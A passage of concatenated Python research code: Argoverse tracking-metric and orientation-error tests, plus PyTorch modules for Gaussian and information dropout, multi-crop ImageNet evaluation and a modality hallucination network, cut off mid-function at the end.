assert f1 == 0.5
assert result_dict['idf1'] == 0.5
assert result_dict['most_track'] == 0.0
assert result_dict['most_lost'] == 0.0
assert result_dict['num_fp'] == 2
assert result_dict['num_miss'] == 2 # false-negatives
assert result_dict['num_sw'] == 0
assert result_dict['num_frag'] == 1
def test_1obj_poor_orientation():
""" """
log_id = '1obj_poor_orientation'
centers = []
# timestamp 0
cx = -3
cy = 2
cz = 0
centers += [(cx,cy,cz)]
# timestamp 1
cx = -1
cy = 2
cz = 0
centers += [(cx,cy,cz)]
# timestamp 2
cx = 1
cy = 2
cz = 0
centers += [(cx,cy,cz)]
# timestamp 3
cx = 3
cy = 2
cz = 0
centers += [(cx,cy,cz)]
yaw_angles = [0.25,-0.25,0.25,-0.25]
# dump the ground truth first
gt_centers, gt_yaw_angles = get_1obj_gt_scenario()
# dump the ground truth first
_ = dump_scenario_json(gt_centers, gt_yaw_angles, log_id, is_gt=True, run_eval=False)
    # pdb.set_trace()  # debugging breakpoint left by the author; disabled so the test can run non-interactively
result_dict = dump_scenario_json(centers, yaw_angles, log_id, is_gt=False)
assert result_dict['num_frames'] == 4
assert result_dict['mota'] == 100.0
assert result_dict['motp_c'] == 0
assert result_dict['motp_o'] == 0.0 # ?????
assert result_dict['motp_i'] == 0.0
assert result_dict['idf1'] == 1.0
assert result_dict['most_track'] == 1.0
assert result_dict['most_lost'] == 0.0
assert result_dict['num_fp'] == 0
assert result_dict['num_miss'] == 0
assert result_dict['num_sw'] == 0
assert result_dict['num_frag'] == 0
"""
Additional examples are here: https://arxiv.org/pdf/1603.00831.pdf
"""
def get_orientation_error_deg(yaw1: float, yaw2: float):
"""
smallest difference between 2 angles
https://stackoverflow.com/questions/1878907/the-smallest-difference-between-2-angles
Args:
- yaw1: angle around unit circle, in radians in [-pi,pi]
- yaw2: angle around unit circle, in radians in [-pi,pi]
Returns:
- error: smallest difference between 2 angles, in degrees
"""
assert -np.pi < yaw1 and yaw1 < np.pi
assert -np.pi < yaw2 and yaw2 < np.pi
error = np.rad2deg(yaw1 - yaw2)
if error > 180:
error -= 360
if error < -180:
error += 360
return np.abs(error)
def test_orientation_error1():
""" """
yaw1 = np.deg2rad(179)
yaw2 = np.deg2rad(-179)
error_deg = get_orientation_error_deg(yaw1, yaw2)
assert np.allclose(error_deg, 2.0, atol=1e-2)
def test_orientation_error2():
""" """
yaw1 = np.deg2rad(-179)
yaw2 = np.deg2rad(179)
error_deg = get_orientation_error_deg(yaw1, yaw2)
print(error_deg)
assert np.allclose(error_deg, 2.0, atol=1e-2)
def test_orientation_error3():
""" """
yaw1 = np.deg2rad(179)
yaw2 = np.deg2rad(178)
error_deg = get_orientation_error_deg(yaw1, yaw2)
assert np.allclose(error_deg, 1.0, atol=1e-2)
def test_orientation_error4():
""" """
yaw1 = np.deg2rad(178)
yaw2 = np.deg2rad(179)
error_deg = get_orientation_error_deg(yaw1, yaw2)
assert np.allclose(error_deg, 1.0, atol=1e-2)
def test_orientation_error5():
""" """
yaw1 = np.deg2rad(3)
yaw2 = np.deg2rad(-3)
error_deg = get_orientation_error_deg(yaw1, yaw2)
assert np.allclose(error_deg, 6.0, atol=1e-2)
def test_orientation_error6():
""" """
yaw1 = np.deg2rad(-3)
yaw2 = np.deg2rad(3)
error_deg = get_orientation_error_deg(yaw1, yaw2)
assert np.allclose(error_deg, 6.0, atol=1e-2)
def test_orientation_error7():
""" """
yaw1 = np.deg2rad(-177)
yaw2 = np.deg2rad(-179)
error_deg = get_orientation_error_deg(yaw1, yaw2)
assert np.allclose(error_deg, 2.0, atol=1e-2)
def test_orientation_error8():
""" """
yaw1 = np.deg2rad(-179)
yaw2 = np.deg2rad(-177)
error_deg = get_orientation_error_deg(yaw1, yaw2)
assert np.allclose(error_deg, 2.0, atol=1e-2)
if __name__ == '__main__':
""" """
# test_1obj_perfect()
# test_1obj_offset_translation()
# test_1obj_poor_translation()
# test_1obj_poor_orientation()
test_orientation_error1()
test_orientation_error2()
test_orientation_error3()
test_orientation_error4()
test_orientation_error5()
test_orientation_error6()
test_orientation_error7()
test_orientation_error8()
```
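The tracking assertions above follow standard CLEAR-MOT bookkeeping. A minimal sketch of the MOTA arithmetic spelled out inline in `test_1obj_poor_translation` (2 misses, 2 false positives, 0 identity switches over 4 ground-truth boxes); whether the evaluator reports a fraction or a percentage is left to the caller:

```python
def mota(num_fn: int, num_fp: int, num_sw: int, num_gt: int) -> float:
    """MOTA = 1 - (FN + FP + IDSW) / #GT, as in the CLEAR-MOT metrics."""
    return 1.0 - (num_fn + num_fp + num_sw) / num_gt

assert mota(num_fn=2, num_fp=2, num_sw=0, num_gt=4) == 0.0  # test_1obj_poor_translation
assert mota(num_fn=0, num_fp=0, num_sw=0, num_gt=4) == 1.0  # perfect tracking (reported as 100.0)
```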
#### File: argoverse-api/tests/test_frame_label_accumulator.py
```python
import glob
import pathlib
import tempfile
import numpy as np
import pytest
from argoverse.data_loading.frame_label_accumulator import PerFrameLabelAccumulator
TEST_DATA_LOC = pathlib.Path(__file__).parent.parent / "tests" / "test_data" / "tracking"
@pytest.fixture
def frame_acc() -> PerFrameLabelAccumulator:
pfa = PerFrameLabelAccumulator(TEST_DATA_LOC, TEST_DATA_LOC, "test", save=False)
pfa.accumulate_per_log_data()
pfa.accumulate_per_log_data(log_id="1")
return pfa
def test_traj_label_place_in_city(frame_acc: PerFrameLabelAccumulator) -> None:
traj_list = frame_acc.get_log_trajectory_labels("1")
city_frame_1_gt = [[[ 2., -1., -1.],
[ 2., -3., -1.],
[ 4., -1., -1.],
[ 4., -3., -1.]],
[[ 3., 1., 1.],
[ 3., 3., 1.],
[ 5., 1., 1.],
[ 5., 3., 1.]],
[[ 1., 4., 1.],
[ 1., 2., 1.],
[-1., 4., 1.],
[-1., 2., 1.]]]
city_frame_0_gt = [[[ 2., 1., 1.],
[ 2., -1., 1.],
[ 0., 1., 1.],
[ 0., -1., 1.]],
[[ 1., 1., -1.],
[ 1., -1., -1.],
[ 3., 1., -1.],
[ 3., -1., -1.]],
[[ 1., 0., 1.],
[ 1., 2., 1.],
[ 3., 0., 1.],
[ 3., 2., 1.]]]
for traj in traj_list:
assert traj.obj_class_str == 'VEHICLE'
city_frame = frame_acc.place_trajectory_in_city_frame(traj,"1")
if traj.track_uuid == "00000000-0000-0000-0000-000000000000":
assert np.array_equal(city_frame_0_gt,city_frame)
elif traj.track_uuid == "00000000-0000-0000-0000-000000000001":
assert np.array_equal(city_frame_1_gt,city_frame)
``` |
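The expected city-frame corners in the test above come from applying each timestamp's egovehicle-to-city pose to the cuboid corners. A generic sketch of that SE(3) transform (not the accumulator's actual code path), with a made-up rotation and translation:

```python
import numpy as np
from scipy.spatial.transform import Rotation

# Hypothetical pose: 90-degree yaw plus a translation into the city frame.
R = Rotation.from_euler("z", 90, degrees=True).as_matrix()
t = np.array([10.0, 5.0, 0.0])

corners_ego = np.array([[2.0, -1.0, -1.0], [2.0, -3.0, -1.0]])  # two cuboid corners in the egovehicle frame
corners_city = corners_ego @ R.T + t  # row-wise R @ p + t
print(corners_city)
```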
{
"source": "johnwlambert/dlupi-heteroscedastic-dropou",
"score": 2
} |
#### File: cnns/base_networks/random_gauss_dropout_vgg.py
```python
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
import math
import torch
from torch.autograd import Variable
__all__ = [
'VGG', 'vgg11', 'vgg11_bn', 'vgg13', 'vgg13_bn', 'vgg16', 'vgg16_bn',
'vgg19_bn', 'vgg19',
]
class VGG_RandomGaussianDropout(nn.Module):
def __init__(self, features):
super(VGG_RandomGaussianDropout, self).__init__()
num_classes = 1000
self.features = features
self.relu = nn.ReLU(True)
self.fc1 = nn.Linear(512 * 7 * 7, 4096)
self.fc2 = nn.Linear(4096, 4096)
self.fc3 = nn.Linear(4096, num_classes)
self._initialize_weights()
def rand_gauss_dropout(self, x):
std = 1.0
mu = 1.0
eps = torch.cuda.FloatTensor( x.size() ).normal_()
eps = Variable( eps, volatile=False ) # we will need the Gradient
noise = eps.mul(std).add_(mu)
return x.mul(noise)
def forward(self, x, train):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.fc1(x)
x = self.relu(x)
if train:
x = self.rand_gauss_dropout(x)
x = self.fc2(x)
x = self.relu(x)
if train:
x = self.rand_gauss_dropout(x)
x = self.fc3(x)
return x
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
def make_layers(cfg, batch_norm=False):
layers = []
in_channels = 3
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
return nn.Sequential(*layers)
cfg = {
'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
def vgg16_bn_random_gaussian_dropout():
"""VGG 16-layer model (configuration "D") with batch normalization
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
return VGG_RandomGaussianDropout(make_layers(cfg['D'], batch_norm=True) )
```
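A minimal usage sketch for the model above, assuming a CUDA device (the multiplicative N(1, 1) noise in `rand_gauss_dropout` is allocated with `torch.cuda.FloatTensor`, so the train-mode path is GPU-only as written) and the import path implied by the file location; the legacy `Variable` calls inside the model target an older PyTorch API:

```python
import torch
from cnns.base_networks.random_gauss_dropout_vgg import vgg16_bn_random_gaussian_dropout

model = vgg16_bn_random_gaussian_dropout().cuda()
x = torch.randn(2, 3, 224, 224).cuda()

logits_train = model(x, train=True)   # Gaussian noise applied after fc1 and fc2
logits_eval = model(x, train=False)   # noise branches skipped entirely
print(logits_train.shape, logits_eval.shape)  # torch.Size([2, 1000]) for both
```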
#### File: cnns/evaluation/multi_crop_eval.py
```python
import torch
import numpy as np
import math
import pdb
from torch.autograd import Variable
import sys
sys.path.append('../..')
from cnns.train.feedforward_routines import feedforward_routine
class MultiCropEvaluator(object):
def __init__(self, opt, model, dataset):
self.opt = opt
self.model = model
self.dataset = dataset
self.nCrops = opt.num_crops
self.num_test_examples = len(self.dataset)
print('There are ', self.num_test_examples, ' num test examples.')
self.softmax_op = torch.nn.Softmax()
self.test_set_counter = 0
# round up the number of batches
self.num_batches = int(math.ceil( self.num_test_examples * 1.0 / self.opt.batch_size ) )
def run_batched_eval_epoch(self):
"""
Compute multi-crop top-1 and top-5 error on batches (e.g. 130 images) from a hold-out set.
First accumulate a batch, then complete a feedforward pass on the batch images.
We employ an ensemble of experts to vote on each image by summing the softmax scores
over the multiple crops.
"""
np.random.seed(1)
torch.manual_seed(1)
torch.cuda.manual_seed(1)
top1Sum, top5Sum = 0.0, 0.0
self.model.eval()
print ('num_batches = ', self.num_batches)
for batch_idx in range(self.num_batches):
if (batch_idx % 20) == 0:
sys.stdout.flush()
batch_images_t, batch_labels = self._accumulate_single_batch_data()
if len(batch_labels) == 0:
break
batch_labels_t = torch.LongTensor(batch_labels)
# convert to CUDA float variables
batch_images_v = Variable( batch_images_t.type(torch.cuda.FloatTensor), volatile=True)
train = False
batch_masks_t = None
x_output_v = feedforward_routine(self.model, batch_images_v, batch_masks_t, train, self.opt)
# 10 crops count as 1 example
num_examples_processed = x_output_v.size(0) / self.opt.num_crops
softmax_output = self.softmax_op(x_output_v)
top1, top5 = self._batch_compute_score(softmax_output, batch_labels_t )
top1Sum = top1Sum + top1*num_examples_processed
top5Sum = top5Sum + top5*num_examples_processed
if ((batch_idx % self.opt.print_every) == 0) or (batch_idx == self.num_batches -2):
print((' | Test: {}/{} top1 {:.4f} top5 {:.4f}').format(
batch_idx, self.num_batches, top1Sum * 1. / self.test_set_counter, top5Sum * 1. / self.test_set_counter ))
batch_top1_acc_frac = top1Sum * 1. / self.num_test_examples
batch_top5_acc_frac = top5Sum * 1. / self.num_test_examples
print( (' * Finished eval top1: {:.4f} top5: {:.4f}\n').format( batch_top1_acc_frac, batch_top5_acc_frac ) )
return batch_top1_acc_frac, batch_top5_acc_frac
def _accumulate_single_batch_data(self):
""" Accumulate a batch of images and their corresponding labels. """
batch_images_t = None
batch_labels = []
for _ in range(self.opt.batch_size):
multicrop_data = self._get_multicrop_data_for_single_idx(self.test_set_counter)
images_t, label = multicrop_data
batch_labels += [label]
if batch_images_t is None:
# starting to accumulate for new batch
batch_images_t = images_t
else:
# append to existing batch data that is being accumulated
batch_images_t = torch.cat((batch_images_t, images_t), 0)
self.test_set_counter += 1 # always increment, so if 0,1,2,3,4, we know that there were 5 images in the end.
if self.test_set_counter >= self.num_test_examples:
break
return batch_images_t, batch_labels
def _get_multicrop_data_for_single_idx(self, idx):
"""
Repeatedly call __getitem__(index) on the ImageFolder class instance ("dataset").
Each time, we obtain a randomly transformed version of the image, indexed via "idx"
from the dataset.
"""
ims = []
example_target = None
for crop_idx in range(self.opt.num_crops):
im, target = self.dataset[idx] # don't need masks at test time
ims += [im]
if example_target is None:
example_target = target
assert target == example_target
batch_ims = torch.stack(ims, 0)
return (batch_ims, example_target)
def _batch_compute_score(self, output, target):
"""
Compute top-1, top-5 accuracy in Torch
10-crop validation error on ImageNet (averaging softmax scores of 10 224x224 crops from resized image with shorter side=256).
The effective batch size is equal to the number of independent examples, because 10 crops of an image
are collapsed into a single prediction.
"""
        num_independent_examples = output.size(0) // self.nCrops # independent means not a different crop of the same image
num_classes = output.size(1)
if self.nCrops > 1:# Sum over crops
output = output.view( num_independent_examples, self.nCrops, num_classes )
# sum over the 10-crop dimension, combining softmax scores over all crops of same image
output = output.data.cpu().sum(1)
else:
            print('Should have been multi crop. Quitting...')
quit()
# Returns the k largest elements of the given input Tensor along a given dimension.
_ , top5_preds = output.float().topk(k=5, dim=1, largest=True, sorted=True) # in descending order
# Find which predictions match the target
correct = top5_preds.eq( target.unsqueeze(1).expand_as(top5_preds) )
# correct has dim (num_independent_examples, 5)
# Top-1 acc score
top1 = correct.narrow(dimension=1, start=0, length=1).sum() # take first column
top1 = top1 * 1.0 / num_independent_examples # as percentage in [0,1]
# Top-5 score, if there are at least 5 classes
top5 = correct.sum()
top5 = top5 * 1.0 / num_independent_examples
return top1, top5
```
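The heart of `_batch_compute_score` is collapsing the crop dimension before scoring. A standalone sketch with random scores, assuming 10 crops per image and 1000 classes, showing the reshape, sum-over-crops, top-k, and comparison steps used above:

```python
import torch

num_images, num_crops, num_classes = 4, 10, 1000
softmax_scores = torch.rand(num_images * num_crops, num_classes)  # (B * crops, classes), as in the evaluator
targets = torch.randint(0, num_classes, (num_images,))

# Sum the per-crop scores of each image (equivalent to averaging for ranking purposes).
per_image = softmax_scores.view(num_images, num_crops, num_classes).sum(dim=1)

_, top5_preds = per_image.topk(k=5, dim=1, largest=True, sorted=True)
correct = top5_preds.eq(targets.unsqueeze(1).expand_as(top5_preds))
top1 = correct[:, 0].float().mean().item()
top5 = correct.any(dim=1).float().mean().item()
print(top1, top5)
```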
#### File: cnns/models/information_dropout.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import torch
import torch.nn as nn
import math
from torch.autograd import Variable
import collections
from cnns.nn_utils.reparameterization_trick import sample_lognormal
import sys
sys.path.append('..')
import os
import numpy as np
import pdb
# Gaussian Dropout as a function of x
class VGG_InformationDropout(nn.Module):
def __init__(self, opt):
super(VGG_InformationDropout, self).__init__()
self.opt = opt
self.FC_size = self.opt.fc_size
self.lognorm_prior = False
self.max_alpha = 0.7
self.activation_fn = 'relu' # 'sigmoid' # not 'softplus'
# CONV LAYERS DO NOT REQUIRE DROPOUT
self.cfg = [64, 64, 'M',
128, 128, 'M',
256, 256, 256, 'M',
512, 512, 512, 'M',
512, 512, 512, 'M']
self.features = self.make_layers()
# If learning these params fails, can also try:
# mu1 = 0.8 * torch.ones(alphas[0].size()).type(torch.cuda.FloatTensor)
# sigm1 = 0.8
# mu1 = 0.5
# sigma1 = 0.4
self.mu1 = nn.Parameter(torch.rand(1)) # learned scalar, requires grad by default
self.sigma1 = nn.Parameter(torch.rand(1)) # learned scalar, requires grad by default
out_recept_fld_sz = opt.image_size / (2 ** 5 ) # 5 max pools that shrink size
assert out_recept_fld_sz == 7
assert self.FC_size == 4096
flattened_feat_sz = 512 * out_recept_fld_sz * out_recept_fld_sz
flattened_feat_sz = int(flattened_feat_sz) # Int must be Tensor Size input
# Using self.opt.activation_fn == 'relu'
# Could also use self.opt.activation_fn == 'softplus' ; x = self.softplus(x)
self.x_fc1 = nn.Sequential(nn.Linear(flattened_feat_sz, self.FC_size), nn.Sigmoid() )
self.fc1_alpha = nn.Sequential(nn.Linear(flattened_feat_sz, self.FC_size), nn.Sigmoid() )
# Squash input here to prevent unbounded noise... (Sigmoid instead of nn.ReLU(True) )
self.x_fc2 = nn.Sequential(nn.Linear(self.FC_size, self.FC_size), nn.Sigmoid() )
self.fc2_alpha = nn.Sequential(nn.Linear(self.FC_size, self.FC_size), nn.Sigmoid() )
assert self.opt.num_classes == 1000
self.x_fc3 = nn.Linear(self.FC_size, self.opt.num_classes)
self._initialize_weights()
def make_layers(self, batch_norm=True):
layers = []
in_channels = 3
for v in self.cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
if self.activation_fn == 'relu':
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
elif self.activation_fn == 'softplus':
layers += [conv2d, nn.BatchNorm2d(v), nn.Softplus()]
elif self.activation_fn == 'sigmoid':
layers += [conv2d, nn.Sigmoid() ]
else:
if self.activation_fn == 'relu':
layers += [conv2d, nn.ReLU(inplace=True)]
elif self.activation_fn == 'softplus':
layers += [conv2d, nn.Softplus()]
elif self.activation_fn == 'sigmoid':
layers += [conv2d, nn.Sigmoid() ]
in_channels = v
return nn.Sequential(*layers)
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
def _KL_div2(self, mu, sigma, mu1, sigma1):
'''KL divergence between N(mu,sigma**2) and N(mu1,sigma1**2)'''
return 0.5 * ((sigma / self.sigma1) ** 2 + (mu - self.mu1) ** 2 / self.sigma1 ** 2 - 1 + 2 * (torch.log(self.sigma1) - torch.log(sigma)))
def _information_dropout(self, x_out, alpha, sigma0=1. ):
""" We already computes the noise parameter alpha from its own FC layer based on the input"""
# Rescale alpha in the allowed range and add a small value for numerical stability
alpha = 0.001 + self.max_alpha * alpha
# Similarly to variational dropout we renormalize so that
# the KL term is zero for alpha == self.max_alpha
if not self.lognorm_prior:
kl = -1. * torch.log(alpha / (self.max_alpha + 0.001))
else:
# info dropout for softplus
            kl = self._KL_div2(torch.log(torch.clamp(x_out, min=1e-4)), alpha, self.mu1, self.sigma1)  # clamp avoids log(0); pass the learned prior params explicitly
zero_mean = Variable( torch.zeros(x_out.size()).type(torch.cuda.FloatTensor) )
noise = sample_lognormal(mean=zero_mean, sigma=alpha, sigma0=sigma0)
# Noisy output of Information Dropout
return x_out * noise, kl
def forward(self, x, train):
if train:
self.sigma0 = 1.
else:
self.sigma0 = 0 # will turn noise into exp(0), which =1
x = self.features(x)
x = x.view(x.size(0), -1)
x_cloned = x.clone()
x = self.x_fc1(x) # compute the noiseless output, includes relu
alpha = self.fc1_alpha(x_cloned)
if train:
x, kl_term1 = self._information_dropout(x, alpha)
x_cloned = x.clone()
x = self.x_fc2(x) # compute the noiseless output, includes relu
alpha = self.fc2_alpha(x_cloned)
if train:
x, kl_term2 = self._information_dropout(x, alpha)
x = self.x_fc3(x)
if train:
kl_terms = []
kl_terms.append(kl_term1)
kl_terms.append(kl_term2)
else:
kl_terms = None
return x, kl_terms
class AllCNN224_InfoDropout(nn.Module):
def __init__(self):
        super(AllCNN224_InfoDropout, self).__init__()
# Striving for Simplicity: The All Convolutional Net [Springenberg et al., 2015]
# Architecture of the ImageNet network.
# input Input 224 x 224 RGB image
self.conv123 = self._build_conv_block(kernel_sz_cfg = [11,1,3],
stride_cfg = [4,1,2],
depth_cfg=[96,96,96],
in_channels = 3)
self.conv456 = self._build_conv_block(kernel_sz_cfg = [5,1,3],
stride_cfg = [1,1,2],
depth_cfg=[256,256,256],
in_channels = 96)
self.conv789 = self._build_conv_block(kernel_sz_cfg = [3,1,3],
stride_cfg = [1,1,2],
depth_cfg=[384,384,384],
in_channels=256)
# dropout 50
self.conv10_11_12 = self._build_conv_block(kernel_sz_cfg = [3,1,1],
stride_cfg = [1,1,1],
depth_cfg=[1024,1024,1000],
in_channels=384)
# global pool global average pooling (6 x 6)
self.avgpool = nn.AvgPool2d(6)
# softmax 1000-way softmax
self.fc = nn.Linear(self.FC_size, self.opt.num_classes)
def _build_conv_block(self, kernel_sz_cfg, stride_cfg, depth_cfg, in_channels, batch_norm=True):
layers = []
        for cfg_idx, depth in enumerate(depth_cfg):
conv2d = nn.Conv2d(in_channels,
depth,
kernel_size=kernel_sz_cfg[cfg_idx],
stride=stride_cfg[cfg_idx])
if batch_norm:
if self.activation_fn == 'relu':
layers += [conv2d, nn.BatchNorm2d(depth), nn.ReLU(inplace=True)]
elif self.activation_fn == 'softplus':
layers += [conv2d, nn.BatchNorm2d(depth), nn.Softplus()]
else:
if self.activation_fn == 'relu':
layers += [conv2d, nn.ReLU(inplace=True)]
elif self.activation_fn == 'softplus':
layers += [conv2d, nn.Softplus()]
in_channels = depth
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv123(x)
# info dropout
x = self.conv456(x)
# info dropout
x = self.conv789(x)
# info dropout
# dropout 50
x = self.conv10_11_12(x)
# info dropout
# global pool
x = self.avgpool(x)
        # softmax 1000
x = self.fc(x)
return x
class AllCNN96_InfoDropout(nn.Module):
def __init__(self):
        super(AllCNN96_InfoDropout, self).__init__()
pass
# Input 96x96
# 3x3 conv 32 ReLU
# 3x3 conv 32 ReLU
# 3x3 conv 32 ReLU stride 2
# dropout
# 3x3 conv 64 ReLU
# 3x3 conv 64 ReLU
# 3x3 conv 64 ReLU stride 2
# dropout
# 3x3 conv 96 ReLU
# 3x3 conv 96 ReLU
# 3x3 conv 96 ReLU stride 2
# dropout
# 3x3 conv 192 ReLU
# 3x3 conv 192 ReLU
# 3x3 conv 192 ReLU stride 2
# dropout
# 3x3 conv 192 ReLU
# 1x1 conv 192 ReLU
# 1x1 conv 10 ReLU
# spatial average
# softmax
def forward(self):
pass
```
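The `forward` pass above returns the logits together with the per-layer KL terms collected during training. In the Information Dropout formulation those KL penalties are added to the task loss with a trade-off coefficient; a minimal sketch of that combination follows (the `beta` value and the helper name are illustrative assumptions, not part of the original code).
```python
import torch.nn as nn

def information_dropout_loss(logits, kl_terms, targets, beta=1e-3):
    """Cross-entropy plus a beta-weighted sum of the per-layer KL penalties."""
    ce = nn.functional.cross_entropy(logits, targets)
    if kl_terms is None:  # evaluation mode: forward() returns kl_terms=None
        return ce
    # each KL term has shape [B, FC_size]; reduce each to a scalar
    kl = sum(k.mean() for k in kl_terms)
    return ce + beta * kl
```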
#### File: cnns/models/modality_hallucination_model.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import torch
import torch.nn as nn
import math
from torch.autograd import Variable
import pdb
import sys
sys.path.append('..')
from cnns.nn_utils.autograd_clamp_grad_to_zero import clamp_grad_to_zero
from cnns.base_networks.vgg_truncated import VGGTruncatedConv, VGGTruncatedClassifier
class VGGNetModified(nn.Module):
def __init__(self,opt,freeze_at_layer_l ):
super(VGGNetModified, self).__init__()
self.opt = opt
self.freeze_at_layer_l = freeze_at_layer_l
self.conv = VGGTruncatedConv(opt)
self.classifier = VGGTruncatedClassifier(opt)
def forward(self, x):
"""
INPUTS:
- x: (N x C x H x W), (64 x 3 x 224 x 224)
We set the learning rates of all layers lower than the hallucination
loss in the depth network to zero.This effectively freezes the depth extractor
up to and including layer so that the target depth activations are not modified
through backpropagation of the hallucination loss.
OUTPUTS:
- midlevel_act: dimensions are (N x 512 x 7 x 7)
- x: these are the logits. dimensions are ( N x 100 )
"""
x = self.conv(x)
midlevel_act = x.clone() # we are extracting activations at pool5
if self.freeze_at_layer_l:
x = clamp_grad_to_zero()(x)
x = self.classifier(x)
return midlevel_act, x
class ModalityHallucinationModel(nn.Module):
def __init__(self,opt):
"""
The hallucination network has parameters independent of both the RGB and
depth networks as we want the hallucination network activations
to match the corresponding depth mid-level activations,
however we do not want the feature extraction to be
identical to the depth network as the inputs are RGB images
for the hallucination network and depth images for the
depth network.
Independently finetune the depth network after initializing with the RGB weights
"""
super(ModalityHallucinationModel, self).__init__()
self.opt = opt
if self.opt.train_depth_only:
self.depth_net = VGGNetModified(opt, freeze_at_layer_l=False)
else:
self.hallucination_net = VGGNetModified(opt, freeze_at_layer_l=False)
self.rgb_net = VGGNetModified(opt, freeze_at_layer_l=False )
self.depth_net = VGGNetModified(opt, freeze_at_layer_l=True )
self.sigmoid = nn.Sigmoid()
def forward(self, RGB_ims, xstar, train):
"""
RGB_ims: (N x C x H x W), (64 x 3 x 224 x 224)
xstar: (N x C x H x W), (64 x 3 x 224 x 224)
"""
if train:
depth_midlevel_act, depth_logits = self.depth_net(xstar)
if self.opt.train_depth_only:
cache = (depth_logits)
return cache
else:
# train all 3 networks
halluc_midlevel_act, halluc_logits = self.hallucination_net(RGB_ims)
_, rgb_logits = self.rgb_net(RGB_ims)
# one additional hallucination loss which matches midlevel
# activations from the hallucination branch to those from the depth branch
# squared l-2 norm. torch.norm( - ) ** 2 is not differentiable in PyTorch
# we can make backprop differentiable at 0. by using torch.pow(-, 2)
hallucination_loss = self.sigmoid(halluc_midlevel_act) - self.sigmoid(depth_midlevel_act)
hallucination_loss = torch.pow( hallucination_loss, 2)
# "Euclidean norm" is generalized Frobenius norm for a tensor?
hallucination_loss = hallucination_loss.sum()
cache = (halluc_midlevel_act, halluc_logits, rgb_logits, depth_midlevel_act, depth_logits, hallucination_loss)
return cache
else:
# Final model which at test time only sees an RGB image, but
# is able to extract both the image features learned through
# finetuning with standard supervised losses as well as the
# hallucinated features which have been trained to mirror those
# features you would extract if a depth image were present.
if self.opt.train_depth_only:
_, depth_logits = self.depth_net(xstar)
cache = (depth_logits)
else:
_, halluc_logits = self.hallucination_net(RGB_ims)
_, rgb_logits = self.rgb_net(RGB_ims)
cache = (halluc_logits, rgb_logits)
return cache
```
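In training mode `ModalityHallucinationModel.forward` returns a six-element cache holding the mid-level activations, the three sets of logits and the already-computed hallucination loss. Below is a hedged sketch of turning that cache into a single objective; the `halluc_weight` factor is an illustrative assumption.
```python
import torch.nn as nn

def hallucination_objective(cache, labels, halluc_weight=10.0):
    """Per-branch classification losses plus the weighted mid-level matching term."""
    (halluc_midlevel_act, halluc_logits, rgb_logits,
     depth_midlevel_act, depth_logits, hallucination_loss) = cache
    ce = nn.CrossEntropyLoss()
    total = ce(rgb_logits, labels) + ce(depth_logits, labels) + ce(halluc_logits, labels)
    return total + halluc_weight * hallucination_loss
```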
#### File: cnns/nn_utils/frobenius.py
```python
import torch
def frobenius_norm(x, take_sqrt_in_frobenius_norm ):
"""
INPUTS:
- tensor in Variable format, of shape NCHW? or ( N x num_fc_output_neurons )
OUTPUTS:
- scalar in Variable format
    Reduces a [ batch_size, C, H, W] tensor to a single scalar: the (optionally
    square-rooted) Frobenius norm of each example, averaged over the batch.
"""
x = torch.pow(x,2)
x = torch.sum(x, 3)
x = torch.sum(x, 2)
x = torch.sum(x, 1)
x = x.squeeze()
# may need to sum if there is 4th dimension also
if take_sqrt_in_frobenius_norm:
x = torch.sqrt(x)
batch_sz = x.size(0)
x = torch.sum(x,0) / batch_sz # avg Frobenius norm loss per training example
return x
```
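A quick usage sketch for `frobenius_norm`; the import path simply mirrors the file location and the tensor values are illustrative.
```python
import torch
from torch.autograd import Variable
from cnns.nn_utils.frobenius import frobenius_norm

x = Variable(torch.ones(8, 3, 4, 4))  # batch of 8 feature maps
loss = frobenius_norm(x, take_sqrt_in_frobenius_norm=True)
# each example sums 3*4*4 = 48 ones, sqrt(48) ~ 6.93, then averaged over the batch
print(loss)
```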
#### File: cnns/nn_utils/reparameterization_trick.py
```python
import torch
from torch.autograd import Variable
def vanilla_reparametrize( mu, std ):
"""
noise = x_output.new().resize_as_(x_output)
"""
#if self.opt.cuda:
# Assume we are in CUDA mode
eps = torch.cuda.FloatTensor(std.size()).normal_()
# else:
# eps = torch.FloatTensor(std.size()).normal_()
eps = Variable(eps)
return eps.mul(std).add_(mu), std
def vae_reparametrize( mu, logvar, distribution= 'normal' ):
std = logvar.mul(0.5).exp_()
# Assume if self.opt.cuda: is True
if distribution == 'normal':
eps = torch.cuda.FloatTensor(std.size()).normal_() # [torch.cuda.FloatTensor of size 1x1x4096 (GPU 0)]
else:
